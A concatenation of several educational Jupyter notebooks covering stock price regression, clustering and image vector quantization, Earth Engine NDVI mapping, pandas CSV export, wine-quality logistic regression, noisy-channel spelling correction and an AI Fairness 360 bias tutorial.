ydf[(ydf.y == 0) & (ydf.y_hat > 0.9)].head(10)
' '.join(index_word[id] for id in all_x_valid[2397])
###Output
_____no_output_____
###Markdown
Instances where neural net was wrong (review was positive but prediction was negative)
###Code
ydf[(ydf.y == 1) & (ydf.y_hat < 0.1)].head(10)
' '.join(index_word[id] for id in all_x_valid[2027])
###Output
_____no_output_____ |
Stock_Prediction_Using_Linear_Regression_and_DecisionTree_Regression_Model.ipynb | ###Markdown
Decision Tree is used in practical approaches of supervised learning.It can be used to solve both Regression and Classification tasks.It is a tree-structured classifier with three types of nodes.Decision tree builds regression or classification models in the form of a tree structure. It breaks down a dataset into smaller and smaller subsets while at the same time an associated decision tree is incrementally developed.Decision trees can handle both categorical and numerical data.
###Code
#Install the dependencies
import numpy as num
import pandas as pan
from sklearn.tree import DecisionTreeRegressor #Decision Trees in Machine Learning to Predict Stock Movements.A decision tree algorithm performs a set of recursive actions before it arrives at the end result and when you plot these actions on a screen, the visual looks like a big tree, hence the name 'Decision Tree'.
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as mat
plt.style.use('bmh')
#Load the data
from google.colab import files
uploaded = files.upload()
###Output
_____no_output_____
###Markdown
The dataset comprises of Open, High, Low, Close Prices and Volume indicators (OHLCV).
###Code
#Store the data into a data frame
dataframe = pan.read_csv('NSE-TATAGLOBAL.csv')
dataframe.head(5)
#Get the number of trading days
dataframe.shape
#Visualize the close price data
mat.figure(figsize=(16,8))
mat.title('TATAGLOBAL')
mat.xlabel('Days')
mat.ylabel('Close Price USD ($)')
mat.plot(df['Close'])
mat.show()
#Get the close Price
dataframe = dataframe[['Close']]
dataframe.head(4)
#Create a variable to predict 'x' days out into the future
future_days = 25
#Create a new column (target) shifted 'x' units/days up
dataframe['Prediction'] = dataframe[['Close']].shift(-future_days)
dataframe.tail(4)
#Create the feature data set (X) and convert it to a numpy array and remove the last 'x' rows/days
X = num.array(dataframe.drop(['Prediction'],1))[:-future_days]
print(X)
#Create the target data set (y) and convert it to a numpy array and get all of the target values except the last 'x' rows/days
y = num.array(dataframe['Prediction'])[:-future_days]
print(y)
#Split the data into 75% training and 25% testing
x_train,x_test,y_train,y_test = train_test_split(X , y ,test_size = 0.25)
#Create the models
#Create the decision tree regressor model
tree = DecisionTreeRegressor().fit(x_train , y_train)
#Create the linear regression model
lr = LinearRegression().fit(x_train , y_train)
#Get the last 'x' rows of the feature data set
x_future = dataframe.drop(['Prediction'], 1)[:-future_days]
x_future = x_future.tail(future_days)
x_future = num.array(x_future)
x_future
#Show the model tree prediction
tree_prediction = tree.predict(x_future)
print(tree_prediction)
print()
#Show the model linear regression prediction
lr_prediction = lr.predict(x_future)
print(lr_prediction)
###Output
[116.45 116.7 111.5 113.05 123.9
99.675 128.725 122.55 111. 114.975
127.125 130.4 141.05 114.45 119.41666667
114.45 117.3 114.975 116.6 118.25
118.65 117.6 112.61666667 121.25 118.6 ]
[121.78884899 123.04822121 123.74787244 125.14717491 123.70122903
121.13584117 122.7217173 124.63409734 122.86164755 122.39521339
123.42136853 124.02773294 125.94011298 127.66591936 127.15284179
127.57263253 123.3280817 122.39521339 122.62843047 123.18815146
120.85598067 118.15066257 118.29059282 118.66374014 117.59094158]
###Markdown
Let's Visualize the data
###Code
predictions = tree_prediction #The regression decision trees take ordered values with continuous values.
valid = dataframe[X.shape[0]:]
valid['Predictions'] = predictions
mat.figure(figsize=(16,8))
mat.title('Stock Market Prediction Decision Tree Regression Model using sklearn')
mat.xlabel('Days')
mat.ylabel('Close Price USD ($)')
mat.plot(dataframe['Close'])
mat.plot(valid[['Close','Predictions']])
mat.legend(['Orig','Val','Pred'])
mat.show()
predictions = lr_prediction #Linear Model for Stock Price Prediction
valid = dataframe[X.shape[0]:]
valid['Predictions'] = predictions
mat.figure(figsize=(16,8))
mat.title('Stock Market Prediction Linear Regression Model')
mat.xlabel('Days')
mat.ylabel('Close Price USD ($)')
mat.plot(df['Close'])
mat.plot(valid[['Close','Predictions']])
mat.legend(['Orig','Val','Pred'])
mat.show()
###Output
/usr/local/lib/python3.7/dist-packages/ipykernel_launcher.py:4: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead
See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
after removing the cwd from sys.path.
|
seminars/04/04_clustering_en.ipynb | ###Markdown
Clustering Within this notebook we will play with clustering. * First try the hierarchical clustering and k-means on artificial data to see visually how those two methods work. * Then, on the Iris dataset we use the hierarchical clustering to observe its structure. * Finally, we focus on the vector quantization as a nice application of k-means algorithm to compress images.
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
%matplotlib inline
np.set_printoptions(precision=5, suppress=True) # suppress scientific float notation (so 0.000 is printed as 0.)
###Output
_____no_output_____
###Markdown
Artificial data - hierarchical clustering & k-means Artificial data generationWe generate random samples from three different multivariate normal distributions and merge them.The parameters of multivariate normal distribution are:* The mean - corresponding to the center of the cluster.* The covariance matrix - corresponding to the shape (circle or ellipse with some direction) and size of the cluster.
###Code
# generate three clusters: a with 60 points, b with 40, c with 20:
np.random.seed(50) # for repeatability of this tutorial
a = np.random.multivariate_normal([7, 7], [[2, 0.5], [0.5, 2]], size=[60,])
b = np.random.multivariate_normal([0, 15], [[2, 0], [0, 2]], size=[40,])
c = np.random.multivariate_normal([15, 0], [[3, 1], [1, 4]], size=[20,])
# merge the clusters into X
X = np.concatenate((a, b, c),)
# print the shape
print(X.shape)
# visualize the data
plt.scatter(X[:,0], X[:,1])
plt.axis('equal')
plt.show()
###Output
_____no_output_____
###Markdown
Hierarchical agglomerative clusteringWe use the `scipy` library and especially its hierarchical clustering functions. [(docs here)](https://docs.scipy.org/doc/scipy/reference/cluster.hierarchy.html).This part is inspired by [this blog post](https://joernhees.de/blog/2015/08/26/scipy-hierarchical-clustering-and-dendrogram-tutorial/). First we create the dendrogramWe use a `linkage` function for that. [(docs here)](https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.htmlscipy.cluster.hierarchy.linkage).* One of its important arguments is a method how the cluster distance is measured.* First we use single linkage, but later you can play with other ones - complete linkage / average linkage / ward's method.
###Code
from scipy.cluster.hierarchy import dendrogram, linkage
# generate the linkage matrix
Z = linkage(X, 'single')
# see the shape of the output
print(Z.shape)
###Output
_____no_output_____
###Markdown
The result is a linkage matrix where each row corresponds to a merging of two clusters. In columns we have:* the index of a first merged cluster* the index of the second merged cluster* the distance between merged clusters* the number of original observations in the newly formed cluster
###Code
# Observe first 5 rows of Z
print(Z[:5,:])
# especially focus on the 3rd row where the second cluster with index 120 is actually the first one created by merging.
###Output
_____no_output_____
###Markdown
Now let us visualize the dendrogramFor this we can use the `dendrogram` function. [(docs here)](https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.dendrogram.htmlscipy.cluster.hierarchy.dendrogram)
###Code
# calculate full dendrogram
plt.figure(figsize=(25, 10))
plt.title('Hierarchical Clustering Dendrogram')
plt.xlabel('sample index')
plt.ylabel('distance')
dendrogram(
Z,
leaf_rotation=90., # rotates the x axis labels
leaf_font_size=8., # font size for the x axis labels
)
plt.show()
###Output
_____no_output_____
###Markdown
We can see that:* horizontal lines are cluster merges* vertical lines tell us which clusters/labels were part of merge forming that new cluster* heights of the horizontal lines corresponds to distances between merged clusters
###Code
# We can also plot just the upper part of the dendrogram
plt.title('Hierarchical Clustering Dendrogram (truncated)')
plt.xlabel('sample index or (cluster size)')
plt.ylabel('distance')
dendrogram(
Z,
truncate_mode='lastp', # show only the last p merged clusters
p=10, # show only the last p merged clusters
leaf_rotation=90.,
leaf_font_size=12.,
show_contracted=True, # to get a distribution impression in truncated branches
)
plt.show()
###Output
_____no_output_____
###Markdown
More fancy version of dendrogram plotWith [annotating the distances inside the dendrogram](https://stackoverflow.com/questions/11917779/how-to-plot-and-annotate-hierarchical-clustering-dendrograms-in-scipy-matplotlib/1231161812311618)
###Code
def fancy_dendrogram(*args, **kwargs):
max_d = kwargs.pop('max_d', None)
if max_d and 'color_threshold' not in kwargs:
kwargs['color_threshold'] = max_d
annotate_above = kwargs.pop('annotate_above', 0)
ddata = dendrogram(*args, **kwargs)
if not kwargs.get('no_plot', False):
plt.title('Hierarchical Clustering Dendrogram (truncated)')
plt.xlabel('sample index or (cluster size)')
plt.ylabel('distance')
for i, d, c in zip(ddata['icoord'], ddata['dcoord'], ddata['color_list']):
x = 0.5 * sum(i[1:3])
y = d[1]
if y > annotate_above:
plt.plot(x, y, 'o', c=c)
plt.annotate("%.3g" % y, (x, y), xytext=(0, -5),
textcoords='offset points',
va='top', ha='center')
if max_d:
plt.axhline(y=max_d, c='k')
return ddata
fancy_dendrogram(
Z,
truncate_mode='lastp',
p=12,
leaf_rotation=90.,
leaf_font_size=12.,
show_contracted=True,
annotate_above=1.9, # useful in small plots so annotations don't overlap
)
plt.show()
###Output
_____no_output_____
###Markdown
Retreiving clusters from the dendrogramFor this we have the `fcluster` function. [(docs here)](https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.fcluster.htmlscipy.cluster.hierarchy.fcluster) If we know the cut height i.e. the threshold for the cluster distance
###Code
from scipy.cluster.hierarchy import fcluster
max_d = 5
clusters = fcluster(Z, max_d, criterion='distance')
# show clusters
print(clusters)
# figure
plt.scatter(X[:,0], X[:,1], c=clusters, cmap='brg') # plot points with cluster dependent colors
plt.show()
# show the cut in the truncated dendrogram
fancy_dendrogram(
Z,
truncate_mode='lastp',
p=12,
leaf_rotation=90.,
leaf_font_size=12.,
show_contracted=True,
annotate_above=1.9, # useful in small plots so annotations don't overlap
max_d = max_d,
)
plt.show()
###Output
_____no_output_____
###Markdown
If we know the number of clusters $k$
###Code
k = 3
clusters = fcluster(Z, k, criterion='maxclust')
# show clusters
print(clusters)
# figure
plt.scatter(X[:,0], X[:,1], c=clusters, cmap='brg') # plot points with cluster dependent colors
plt.show()
###Output
_____no_output_____
###Markdown
K-means algorithmWe use `clustering` part of the `sklearn` library. [(docs here)](http://scikit-learn.org/stable/modules/clustering.htmlk-means)There is a function `Kmeans` which can be used for that. [(docs here)](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.htmlsklearn.cluster.KMeans)
###Code
from sklearn.cluster import KMeans
# first lets try 2 clusters
k = 2
kmeans = KMeans(n_clusters = k, random_state = 1).fit(X)
# to show resulting clusters
print(kmeans.labels_)
# to see cluster centers
print(kmeans.cluster_centers_)
# figure
plt.scatter(X[:,0], X[:,1], c=kmeans.labels_, cmap='brg', alpha=0.4) # plot points with cluster dependent colors
plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], c = 'black', s=100)
plt.show()
# the same for 3 clusters
k = 3
kmeans = KMeans(n_clusters = k, random_state = 1).fit(X)
# figure
plt.scatter(X[:,0], X[:,1], c=kmeans.labels_, cmap='brg', alpha=0.4) # plot points with cluster dependent colors
plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], c = 'black', s=100)
plt.show()
###Output
_____no_output_____
###Markdown
In the default setting the algorithm initializes in some smart way, `init = 'k-means++'` [David, Vassilvitskii (2007)](http://ilpubs.stanford.edu:8090/778/1/2006-13.pdf), and the whole run is repeated 10 times, `n_init = 10`.It is also possible to initialize it manually or with random selection from the data.
###Code
k = 3
# manual initialization
initial_centers = np.array([[0,10],[10,10],[10,0]])
# clusterring
kmeans = KMeans(n_clusters = k, random_state = 1, init = initial_centers, n_init = 1).fit(X)
# figure
plt.scatter(X[:,0], X[:,1], c=kmeans.labels_, cmap='brg', alpha=0.4) # plot points with cluster dependent colors
plt.scatter(initial_centers[:,0], initial_centers[:,1], c = 'black', s=50, alpha = 0.9, marker = 'x') # initial centers
plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], c = 'black', s=100) # final centers
plt.legend(['Data', 'Initial Centers', 'Final Centroids'])
plt.show()
###Output
_____no_output_____
###Markdown
The $k$-means may be also performed manually
###Code
from sklearn.metrics import pairwise_distances_argmin
centers = initial_centers
for i in range(3):
y_pred = pairwise_distances_argmin(X, centers)
new_centers = np.array([X[y_pred == i].mean(0) for i in range(len(centers))])
# figure
plt.scatter(X[:,0], X[:,1], c=y_pred, cmap='brg', alpha=0.4) # plot points with cluster dependent colors
plt.scatter(centers[:,0], centers[:,1], c = 'black', s=50, alpha = 0.9, marker = 'x') # old centers
plt.scatter(new_centers[:,0], new_centers[:,1], c = 'black', s=100) # new centers
plt.title('Manual $k$-means, step ' + str(i+1))
plt.legend(['Data', 'Old Centers', 'New Centers'])
plt.show()
centers = new_centers
###Output
_____no_output_____
###Markdown
Elbow method for $k$ estimation
###Code
ix = np.zeros(5)
iy = np.zeros(5)
for k in range(ix.shape[0]):
kmeans = KMeans(n_clusters=k+1, random_state = 1)
kmeans.fit(X)
iy[k] = kmeans.inertia_
ix[k] = k+1
plt.xlabel('$k$')
plt.ylabel('Objective function')
plt.plot(ix, iy, 'o-')
plt.show()
###Output
_____no_output_____
###Markdown
Task 1 - perform hierarchical clustering on Iris dataset* Search for 3 clusters* Discuss and measure somehow the quality of final clusters. The real types of irises’ (Setosa, Versicolour, and Virginica) are stored in y variable.* Try to find a cluster distance function such that the final clusters correspond to real types as accurate as possible.
###Code
from sklearn import datasets
iris = datasets.load_iris()
X = iris.data
y = iris.target
print('X shape:', X.shape)
## your code here
Z = linkage(X, 'single') # best is ward - at least between the triple - single, complete and ward
k = 3
clusters = fcluster(Z, k, criterion='maxclust')
# recode values so they match - this have to be done manually
print('Assigned clusters:', clusters)
print('True types:', y)
# - ward method & single linkage
clusters[clusters == 1] = 0
clusters[clusters == 3] = 1
# - complete linkage
# clusters[clusters == 3] = 0
# clusters[clusters == 2] = 3
# clusters[clusters == 1] = 2
# clusters[clusters == 3] = 1
# show accuracy
print('Accuracy:', 1 - np.abs(clusters - y).sum()/y.shape[0])
###Output
_____no_output_____
###Markdown
Task 2 - perform vector quantization with $k$-means on a figureYou need to install Pillow package`pip install Pillow`. [(docs here)](https://pillow.readthedocs.io/en/5.3.x/index.html)First some code that brings you to the task itself.
###Code
from PIL import Image
# open and conver to grayscale
im = Image.open("figure.jpg").convert("L")
# covert to numpy array of numbers between 0 and 1
pix = np.array(im)/255.0
print('Shape of the array:', pix.shape)
# visualize
plt.imshow(pix, cmap="gray", clim=(0, 1));
plt.show()
###Output
_____no_output_____
###Markdown
Now the task:* crop the image width to be a multiply of 4* create column blocks of length 4 - i.e. subparts from the original image of the shape (1,4)* perform k-means clusterring with k = 255 - i.e. one byte will be sufficient to transmit the cluster indices* extract centroids and labels from the clustering* decode them back to the array of the original shape - **hint** - use: `restored = np.take(centroids, labels, axis = 0)`* visualize the result* discuss the size reduction (compression) when one uses the centroids and lables instead of the original pixels.
###Code
## your code here
# set block length to 4
block_len = 4
# crop the image to optimal size
rows,cols = pix.shape
pix = pix[:, :(cols - cols % block_len)]
# reshape the figure to create the blocks
X = pix.reshape(-1, block_len)
print(X.shape)
# perform clusterring
k = 255 # i.e. one byte will be sufficient for transfering the values
kmeans = KMeans(n_clusters = k, random_state = 1, n_init = 2).fit(X)
# extract the centroids and labels
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
print(centroids.shape)
print(labels.shape)
# restore the compressed image from centroids and labels
restored = np.take(centroids, labels, axis = 0)
final_pix = restored.reshape(pix.shape)
# visualize a result
plt.imshow(final_pix, cmap="gray", clim=(0, 1));
plt.show()
###Output
_____no_output_____ |
tarea/Respuesta.ipynb | ###Markdown
**Bienvenidos!** Este *colab notebook* es parte del curso [**Introduccion a Google Earth Engine con Python**](https://github.com/csaybar/EarthEngineMasterGIS) desarrollado por el equipo [**MasterGIS**](https://www.mastergis.com/). Obten mas informacion del curso en este [**enlace**](https://www.mastergis.com/product/google-earth-engine/). El contenido del curso esta disponible en [**GitHub**](https://github.com/csaybar/EarthEngineMasterGIS) bajo licencia [**MIT**](https://opensource.org/licenses/MIT).
###Code
###Output
_____no_output_____
###Markdown
**Ejercicio Resuelto: Mapa de Índice espectral - NDVI **
###Code
#Autenticar e iniciar Google Earth Engine
import ee
ee.Authenticate()
ee.Initialize()
#@title mapdisplay: Crea mapas interactivos usando folium
import folium
def mapdisplay(center, dicc, Tiles="OpensTreetMap",zoom_start=10):
'''
:param center: Center of the map (Latitude and Longitude).
:param dicc: Earth Engine Geometries or Tiles dictionary
:param Tiles: Mapbox Bright,Mapbox Control Room,Stamen Terrain,Stamen Toner,stamenwatercolor,cartodbpositron.
:zoom_start: Initial zoom level for the map.
:return: A folium.Map object.
'''
center = center[::-1]
mapViz = folium.Map(location=center,tiles=Tiles, zoom_start=zoom_start)
for k,v in dicc.items():
if ee.image.Image in [type(x) for x in v.values()]:
folium.TileLayer(
tiles = v["tile_fetcher"].url_format,
attr = 'Google Earth Engine',
overlay =True,
name = k
).add_to(mapViz)
else:
folium.GeoJson(
data = v,
name = k
).add_to(mapViz)
mapViz.add_child(folium.LayerControl())
return mapViz
###Output
_____no_output_____
###Markdown
**1. Cargar datos vectoriales**
###Code
colombia = ee.FeatureCollection('users/sergioingeo/Colombia/Col')
colombia_img = colombia.draw(color = "000000", strokeWidth = 3, pointRadius = 3)
centroide = colombia.geometry().centroid().getInfo()['coordinates']
# Mostrar el ROI
mapdisplay(centroide,{'colombia':colombia_img.getMapId()},zoom_start= 6)
###Output
_____no_output_____
###Markdown
**2. Cargar datos raster (Imagenes)**
###Code
#Colección de imagenes Landsat 8 "Surface Reflectance"
coleccion = ee.ImageCollection("LANDSAT/LC08/C01/T1_SR")\
.filterDate('2018-01-01', '2018-12-31')\
.filterBounds(colombia)\
.filterMetadata('CLOUD_COVER' ,'less_than',50)
###Output
_____no_output_____
###Markdown
**3. Calculo del índice normalizado**Utiliza .normalizedDifference para realizar este ejercicio
###Code
def ndvi(image):
return image.normalizedDifference([ 'B5' ,'B4']).rename('NDVI')
ndvi = coleccion.map(ndvi).mean().clip(colombia)
palette = [
'FFFFFF','CE7E45','DF923D','F18555','FCD163','998718',
'74A901','66A000','529400','3E8601','207401','056201',
'004C00','023801','012E01','011D01','011D01','011301']
NDVI= ndvi.getMapId({'min': 0, 'max': 1, 'palette':palette })
mapdisplay(centroide,{'NDVI':NDVI },zoom_start= 6)
###Output
_____no_output_____
###Markdown
**4. Descargar los resultados (De Google Earth Engine a Google Drive)****ee.batch.Export.table.toDrive():** Guarda FeatureCollection como shapefile en Google Drive.**ee.batch.Export.image.toDrive():** Guarda Images como GeoTIFF en Google Drive.
###Code
# Donde
# image: Es la imagén raster con la informacion del índice
# description: es el nombre que tendra el archivo en Google Drive.
# folder: es la carpeta que se creara en Google Drive.
# region: es el área que se exportará del producto creado.
# maxPixels: Aumenta o limita la cantidad máxima de pixels que pueden ser exportados.
# scale: El tamaño de los pixels de la imagén que serán exportados en metros.
task = ee.batch.Export.image.toDrive(
image= ndvi,
description='NDVI_Colombia',
folder='TareaMASTERGIS',
scale= 1000,
region = colombia.geometry(),
maxPixels = 1e13)
task.start()
from google.colab import drive
drive.mount('/content/drive')
#@title Mensage Final del curso
%%html
<marquee style='width: 30%; color: blue;'><b>MUCHAS GRACIAS ESPERO TE HAYAS DIVERTIDO TOMANDO ESTE CURSO :3 ... HASTA UNA PROXIMA OPORTUNIDAD</b></marquee>
###Output
_____no_output_____ |
Export Pandas DataFrame Sebagai File csv.ipynb | ###Markdown
Export Pandas DataFrame Sebagai File CSVArtikel berikut merupakan tutorial pandas singkat mengenai penggunaan fungsi to_csv beserta opsi-opsi yang sering digunakan untuk melakukan export Pandas DataFrame ke file csv. Yuk langsung saja kita **KODING** ! Dataset Sebelum kita koding, kita akan membuat dataset sederhana yang terdiri dari 2 field, yaitu Name, Python Score dan Average Score.
###Code
import pandas as pd
dataset = {
'Name': ['Andi','Budi','Candil','Dudung'],
'Python Score': [75, 84, 95, 64],
'Average Score': [80.67, 75.5, 89.3, 72.45]
}
df = pd.DataFrame(dataset)
print (df)
###Output
Name Python Score Average Score
0 Andi 75 80.67
1 Budi 84 75.50
2 Candil 95 89.30
3 Dudung 64 72.45
###Markdown
Export Pandas DataFrame ke File csv
###Code
df.to_csv('filename.csv')
###Output
_____no_output_____
###Markdown
Untuk menghilangkan index sehingga tidak ikut ke dalam file csv yang kita export, gunakan opsi opsi **index** yang diset **False**
###Code
df.to_csv('filename.csv', index=False)
###Output
_____no_output_____
###Markdown
Opsi sepOpsi **sep** digunakan untuk merubah delimeter sesuai yang diharapkan. Delimiter default adalah koma '**,**'
###Code
df.to_csv('filename.csv',sep='\t')
###Output
_____no_output_____
###Markdown
Opsi headerJika ada kebutuhan untuk melalukan export Pandas DataFrame ke file csv tanpa menyertakan header atau nama kolom, dapat menggunaka opsi **header** yang diset **False**
###Code
df.to_csv('filename.csv',header=False)
###Output
_____no_output_____
###Markdown
Opsi columnsUntuk melakukan seleksi kolom yang akan dieksport menggunakan opsi **columns**
###Code
df.to_csv('filename.csv',columns=['Name', 'Average Score'])
###Output
_____no_output_____
###Markdown
Opsi float_formatOpsi float_format dapat digunakan untuk memformat data dengan tipe float
###Code
df.to_csv('filename.csv',float_format='%.2f')
###Output
_____no_output_____
###Markdown
Opsi na_repUntuk memberikan nilai tertentu pada kolom atau field yang memiliki nilai null dapat dilakukan langsung menggunakan opsi **na_rep**. Contoh dibawah akan mengisi nilai null dengan '**Unknown**'
###Code
df.to_csv('filename.csv',na_rep='Unkown')
###Output
_____no_output_____ |
.ipynb_checkpoints/logistic-regression-volatile-acidity-red-checkpoint.ipynb | ###Markdown
Logistic RegressionLogistic Regression is a statistical method for predicting binary outcomes from data.Examples of this are "yes" vs "no" or "young" vs "old".These are categories that translate to probability of being a 0 or a 1.Source: Logistic Regression We can calculate logistic regression by adding an activation function as the final step to our linear model.This converts the linear regression output to a probability.
###Code
%matplotlib notebook
import matplotlib.pyplot as plt
from sklearn.neighbors import KNeighborsClassifier
import pandas as pd
import numpy as np
import os
###Output
_____no_output_____
###Markdown
Generate some data
###Code
df = pd.read_csv(os.path.join(".", "assets", "winequality-red.csv"))
df.head()
y = df["quality"]
y
X = df.drop("quality", axis=1)
X.head()
print(f"Labels: {y[:10]}")
print(f"Data: {X[:10]}")
# Visualizing both classes
#plt.scatter(X[:, 0], X[:, 1], c=y)
y_arr = y.to_numpy()
y_arr
X_arr = X.to_numpy()
X_arr
X_arr[:,1]
###Output
_____no_output_____
###Markdown
Split our data into training and testing
###Code
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X_arr, y_arr, random_state=1)
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(max_iter=40000)
classifier
classifier.fit(X_train, y_train)
print(f"Training Data Score: {classifier.score(X_train, y_train)}")
print(f"Testing Data Score: {classifier.score(X_test, y_test)}")
X = X_arr
X
y = y_arr
y
# Review for Volatile Acidity
plt.scatter(X[:, 1], y, c=y)
plt.title("Logistic Regression of Red Wine Quality Factors")
plt.xlabel("Volatile Acidity")
plt.ylabel("Quality")
plt.savefig("output-data/Logistic-Regression-Red-Wine-VolitleAcidity.png")
plt.show()
print(X, y)
predictions = classifier.predict(X_test)
pd.DataFrame({"Prediction": predictions, "Actual": y_test})
###Output
_____no_output_____ |
src/noisy/ngrams_noisy.ipynb | ###Markdown
Load data
###Code
corpus_dir = '../../data/corpus/'
model_dir = '../../data/ngrams/'
noisy = pd.read_csv(f'{corpus_dir}noisy.csv')
noisy.shape
###Output
_____no_output_____
###Markdown
Load Ngram Language Models
###Code
with open(f'{model_dir}counter.pickle', 'rb') as file:
counter = pickle.load(file)
with open(f'{model_dir}vocabulary.pickle', 'rb') as file:
vocabulary = pickle.load(file)
###Output
_____no_output_____
###Markdown
Lidstone (add-a smoothing) trigram
###Code
trigramL = MLidstone(gamma=0.0063, order=3, vocabulary=vocabulary, counter=counter)
channel = NoisyChannelModel(trigramL)
###Output
_____no_output_____
###Markdown
Poisson Channel model
###Code
def best_l(l):
channel.l = l
df = channel.beam_search_sentences(noisy.err)
return np.array([wer(correct, changed) for correct, changed in zip(noisy.cor, df[0].str.lower())]).mean()
channel.channel_method_poisson = True
channel.channel_prob_param = 0.01
best = fmin(fn=best_l, space=hp.uniform('l', 0.2, 5), algo=tpe.suggest, max_evals=20)
best['l']
###Output
_____no_output_____
###Markdown
Normalized and inversely proportional to edit distances channel model
###Code
channel.channel_method_poisson = False
channel.channel_prob_param = 0.99
best = fmin(fn=best_l, space=hp.uniform('l', 0.2, 5), algo=tpe.suggest, max_evals=20)
best['l']
###Output
_____no_output_____
###Markdown
Interpolated with Kneser-Ney smoothing trigram
###Code
trigramKNI = MKneserNeyInterpolated(order=3, discount=0.9276, vocabulary=vocabulary, counter=counter)
channel = NoisyChannelModel(trigramKNI)
###Output
_____no_output_____
###Markdown
Poisson Channel model
###Code
channel.channel_method_poisson = True
channel.channel_prob_param = 0.01
best = fmin(fn=best_l, space=hp.uniform('l', 0.2, 5), algo=tpe.suggest, max_evals=20)
best['l']
###Output
_____no_output_____
###Markdown
Normalized and inversely proportional to edit distances channel model
###Code
channel.channel_method_poisson = False
channel.channel_prob_param = 0.99
best = fmin(fn=best_l, space=hp.uniform('l', 0.2, 5), algo=tpe.suggest, max_evals=20)
best['l']
###Output
_____no_output_____ |
documents/spring20/RDS_Lab_2_2020.ipynb | ###Markdown
Detecting and mitigating age bias on credit decisions The goal of this tutorial is to introduce the basic functionality of AI Fairness 360. Biases and Machine LearningA machine learning model makes predictions of an outcome for a particular instance. (Given an instance of a loan application, predict if the applicant will repay the loan.) The model makes these predictions based on a training dataset, where many other instances (other loan applications) and actual outcomes (whether they repaid) are provided. Thus, a machine learning algorithm will attempt to find patterns, or generalizations, in the training dataset to use when a prediction for a new instance is needed. (For example, one pattern it might discover is "if a person has salary > USD 40K and has outstanding debt < USD 5, they will repay the loan".) In many domains this technique, called supervised machine learning, has worked very well.However, sometimes the patterns that are found may not be desirable or may even be illegal. For example, a loan repay model may determine that age plays a significant role in the prediction of repayment because the training dataset happened to have better repayment for one age group than for another. This raises two problems: 1) the training dataset may not be representative of the true population of people of all age groups, and 2) even if it is representative, it is illegal to base any decision on a applicant's age, regardless of whether this is a good prediction based on historical data.AI Fairness 360 is designed to help address this problem with _fairness metrics_ and _bias mitigators_. Fairness metrics can be used to check for bias in machine learning workflows. Bias mitigators can be used to overcome bias in the workflow to produce a more fair outcome. The loan scenario describes an intuitive example of illegal bias. However, not all undesirable bias in machine learning is illegal it may also exist in more subtle ways. For example, a loan company may want a diverse portfolio of customers across all income levels, and thus, will deem it undesirable if they are making more loans to high income levels over low income levels. Although this is not illegal or unethical, it is undesirable for the company's strategy.As these two examples illustrate, a bias detection and/or mitigation toolkit needs to be tailored to the particular bias of interest. More specifically, it needs to know the attribute or attributes, called _protected attributes_, that are of interest: race is one example of a _protected attribute_ and age is a second. The Machine Learning WorkflowTo understand how bias can enter a machine learning model, we first review the basics of how a model is created in a supervised machine learning process. First, the process starts with a _training dataset_, which contains a sequence of instances, where each instance has two components: the features and the correct prediction for those features. Next, a machine learning algorithm is trained on this training dataset to produce a machine learning model. This generated model can be used to make a prediction when given a new instance. A second dataset with features and correct predictions, called a _test dataset_, is used to assess the accuracy of the model.Since this test dataset is the same format as the training dataset, a set of instances of features and prediction pairs, often these two datasets derive from the same initial dataset. A random partitioning algorithm is used to split the initial dataset into training and test datasets.Bias can enter the system in any of the three steps above. The training data set may be biased in that its outcomes may be biased towards particular kinds of instances. The algorithm that creates the model may be biased in that it may generate models that are weighted towards particular features in the input. The test data set may be biased in that it has expectations on correct answers that may be biased. These three points in the machine learning process represent points for testing and mitigating bias. In AI Fairness 360 codebase, we call these points _pre-processing_, _in-processing_, and _post-processing_. AI Fairness 360We are now ready to utilize AI Fairness 360 (`aif360`) to detect and mitigate bias. We will use the German credit dataset, splitting it into a training and test dataset. We will look for bias in the creation of a machine learning model to predict if an applicant should be given credit based on various features from a typical credit application. The protected attribute will be "Age", with "1" (older than or equal to 25) and "0" (younger than 25) being the values for the privileged and unprivileged groups, respectively.For this first tutorial, we will check for bias in the initial training data, mitigate the bias, and recheck. More sophisticated machine learning workflows are given in the author tutorials and demo notebooks in the codebase.Here are the steps involved Step 1: Write import statements Step 2: Set bias detection options, load dataset, and split between train and test Step 3: Compute fairness metric on original training dataset Step 4: Mitigate bias by transforming the original dataset Step 5: Compute fairness metric on transformed training dataset Step 1 Import StatementsAs with any python program, the first step will be to import the necessary packages. Below we import several components from the `aif360` package. We import the GermanDataset, metrics to check for bias, and classes related to the algorithm we will use to mitigate bias.
###Code
# Load all necessary packages
import sys
sys.path.insert(1, "../")
import numpy as np
np.random.seed(0)
from aif360.datasets import GermanDataset
from aif360.metrics import BinaryLabelDatasetMetric, DatasetMetric
from aif360.algorithms.preprocessing import Reweighing
from aif360.explainers import MetricTextExplainer, MetricJSONExplainer
from IPython.display import Markdown, display
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import json
from collections import OrderedDict
###Output
_____no_output_____
###Markdown
